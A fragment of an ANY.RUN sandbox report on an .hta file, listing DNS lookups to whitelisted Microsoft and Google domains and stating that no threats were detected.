US
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 40.127.240.158
whitelisted
google.com
  • 172.217.18.14
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 95.101.149.131
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.160.66
  • 20.190.160.14
  • 40.126.32.133
  • 20.190.160.128
  • 40.126.32.136
  • 20.190.160.64
  • 20.190.160.67
  • 40.126.32.72
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
slscr.update.microsoft.com
  • 52.149.20.212
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
botharefgoodformajorworktogivebestthignstodobetter.hta